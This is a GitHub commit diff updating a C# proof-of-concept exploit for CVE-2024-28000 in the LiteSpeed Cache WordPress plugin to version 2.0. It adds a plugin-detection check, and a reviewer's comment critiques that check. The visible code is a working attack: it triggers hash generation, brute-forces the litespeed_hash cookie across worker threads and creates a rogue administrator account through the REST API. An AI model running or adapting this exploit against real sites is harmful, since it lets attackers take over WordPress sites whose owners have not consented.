By EbraSha
ver 2.0
ebrasha committed Aug 29, 2024
1 parent 3b21366 commit c6ce3d6
Showing 5 changed files with 75 additions and 29 deletions.
6 changes: 3 additions & 3 deletions Abdal CVE-2024-28000.csproj
Expand Up @@ -8,9 +8,9 @@
<Nullable>enable</Nullable>
<ApplicationIcon>Dev\logo.ico</ApplicationIcon>
<PackageIcon>128.png</PackageIcon>
<AssemblyVersion>1.0</AssemblyVersion>
<FileVersion>1.0</FileVersion>
<Version>1.0</Version>
<AssemblyVersion>2.0</AssemblyVersion>
<FileVersion>2.0</FileVersion>
<Version>2.0</Version>
<Copyright>Programmer: Ebrahim Shafiei (EbraSha)</Copyright>
</PropertyGroup>

92 changes: 69 additions & 23 deletions Program.cs
Expand Up @@ -22,8 +22,37 @@ class Program

private static readonly HttpClient client = new HttpClient();

static void Main(string[] args)
static async Task<string> CheckLiteSpeedTagAsync(string url)
{
try
{
using (HttpClient client = new HttpClient())
{
HttpResponseMessage response = await client.GetAsync(url);

if (response.Headers.Contains("X-LiteSpeed-Tag"))
{
return "Header Found";
}
else
{
return "The LiteSpeed Cache plugin is not installed on this site.";
}
}
}
catch (HttpRequestException ex)
{
return $"Connection Error: {ex.Message}";
}
catch (Exception ex)
{
return $"General Error: {ex.Message}";
}
}

static async Task Main(string[] args)
{
Console.Title = "Abdal CVE-2024-28000 - POC by EbraSha";
// Display disclaimer
DisplayDisclaimer();

Expand Down Expand Up @@ -54,20 +83,32 @@ static void Main(string[] args)
Console.Write("Enter the new admin password: ");
newUserPassword = Console.ReadLine();

// Seed the random number generator (mimicking mt_srand)
Random random = new Random();
// check LiteSpeed Plugin
string PluginStatus = await CheckLiteSpeedTagAsync(targetUrl);
if (PluginStatus == "Header Found")
{
// Seed the random number generator (mimicking mt_srand)
Random random = new Random();

// Trigger hash generation
TriggerHashGeneration().Wait();

// Trigger hash generation
TriggerHashGeneration().Wait();
// Create and start worker threads
List<Task> tasks = new List<Task>();
for (int i = 0; i < numWorkers; i++)
{
tasks.Add(Task.Run(() => Worker()));
}

// Create and start worker threads
List<Task> tasks = new List<Task>();
for (int i = 0; i < numWorkers; i++)
Task.WaitAll(tasks.ToArray());
}
else
{
tasks.Add(Task.Run(() => Worker()));
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine(PluginStatus);
Console.ReadLine();
Console.ResetColor();
}

Task.WaitAll(tasks.ToArray());
}

private static void DisplayDisclaimer()
Expand All @@ -90,6 +131,7 @@ private static void DisplayBanner()
{
Console.ForegroundColor = ConsoleColor.White;
Console.WriteLine("============================================");
Console.WriteLine(" Abdal CVE-2024-28000 Ver 2.0 ");
Console.WriteLine(" PoC: Ebrahim Shafiei (EbraSha) ");
Console.WriteLine(" Telegram: https://t.me/ProfShafiei ");
Console.WriteLine(" Email: Prof.Shafiei@gmail.com ");
Expand All @@ -102,10 +144,10 @@ private static void DisplayBanner()
private static async Task TriggerHashGeneration()
{
var payload = new Dictionary<string, string>
{
{ "action", "async_litespeed" },
{ "litespeed_type", "crawler" }
};
{
{ "action", "async_litespeed" },
{ "litespeed_type", "crawler" }
};

var content = new FormUrlEncodedContent(payload);
try
Expand All @@ -120,7 +162,8 @@ private static async Task TriggerHashGeneration()
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[ERROR] Failed to trigger hash generation - Status code: {response.StatusCode}");
Console.WriteLine(
$"[ERROR] Failed to trigger hash generation - Status code: {response.StatusCode}");
Console.ResetColor();
}
}
Expand All @@ -135,10 +178,10 @@ private static async Task TriggerHashGeneration()
private static async Task AttemptHash(string hashValue)
{
var cookies = new Dictionary<string, string>
{
{ "litespeed_hash", hashValue },
{ "litespeed_role", adminUserId }
};
{
{ "litespeed_hash", hashValue },
{ "litespeed_role", adminUserId }
};

var requestMessage = new HttpRequestMessage(HttpMethod.Post, $"{targetUrl}{restApiEndpoint}");
foreach (var cookie in cookies)
Expand All @@ -165,7 +208,8 @@ private static async Task AttemptHash(string hashValue)
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[ERROR] Unexpected response for hash: {hashValue} - Status code: {response.StatusCode}");
Console.WriteLine(
$"[ERROR] Unexpected response for hash: {hashValue} - Status code: {response.StatusCode}");
Console.ResetColor();
}
}
Expand All @@ -187,7 +231,8 @@ private static async Task CreateAdminUser(Dictionary<string, string> cookies)
roles = new[] { "administrator" }
};

var jsonContent = new StringContent(Newtonsoft.Json.JsonConvert.SerializeObject(userData), Encoding.UTF8, "application/json");
var jsonContent = new StringContent(Newtonsoft.Json.JsonConvert.SerializeObject(userData), Encoding.UTF8,
"application/json");
var requestMessage = new HttpRequestMessage(HttpMethod.Post, $"{targetUrl}{restApiEndpoint}")
{
Content = jsonContent
Expand All @@ -210,7 +255,8 @@ private static async Task CreateAdminUser(Dictionary<string, string> cookies)
else
{
Console.ForegroundColor = ConsoleColor.Yellow;
Console.WriteLine($"[ERROR] Failed to create admin user - Status code: {response.StatusCode} - Response: {await response.Content.ReadAsStringAsync()}");
Console.WriteLine(
$"[ERROR] Failed to create admin user - Status code: {response.StatusCode} - Response: {await response.Content.ReadAsStringAsync()}");
Console.ResetColor();
}
}
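Review bot: In `CheckLiteSpeedTagAsync`, a single GET without an `X-LiteSpeed-Tag` header is reported as "The LiteSpeed Cache plugin is not installed on this site.", which the response does not establish; the header may simply be absent from that one response (presumably, for example, when an intermediary strips it), so an administrator checking their own site could read it as a clean result. I would word it as `return "X-LiteSpeed-Tag header not present; plugin status could not be determined.";` and confirm exposure from the installed plugin version against the vendor advisory for CVE-2024-28000. The result also reaches `Main` as a display string and is tested with `PluginStatus == "Header Found"`, so any later rewording silently flips the branch; returning a `bool` or an enum and formatting the message in `Main` avoids that. The method also declares a local `HttpClient client` that shadows the static `client` field and never disposes `response`. `Main`'s body continues outside the visible hunks.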
2 changes: 1 addition & 1 deletion obj/Abdal CVE-2024-28000.csproj.nuget.dgspec.json
Expand Up @@ -5,7 +5,7 @@
},
"projects": {
"C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj": {
"version": "1.0.0",
"version": "2.0.0",
"restore": {
"projectUniqueName": "C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj",
"projectName": "Abdal CVE-2024-28000",
2 changes: 1 addition & 1 deletion obj/project.assets.json
Expand Up @@ -138,7 +138,7 @@
"C:\\Program Files (x86)\\Progress\\ToolboxNuGetPackages": {}
},
"project": {
"version": "1.0.0",
"version": "2.0.0",
"restore": {
"projectUniqueName": "C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj",
"projectName": "Abdal CVE-2024-28000",
2 changes: 1 addition & 1 deletion obj/project.nuget.cache
@@ -1,6 +1,6 @@
{
"version": 2,
"dgSpecHash": "ILzC+d1/n2E=",
"dgSpecHash": "o9PtRK6WRYY=",
"success": true,
"projectFilePath": "C:\\Users\\EbraSha\\Documents\\Github\\CVE-2024-28000\\Abdal CVE-2024-28000\\Abdal CVE-2024-28000.csproj",
"expectedPackageFiles": [
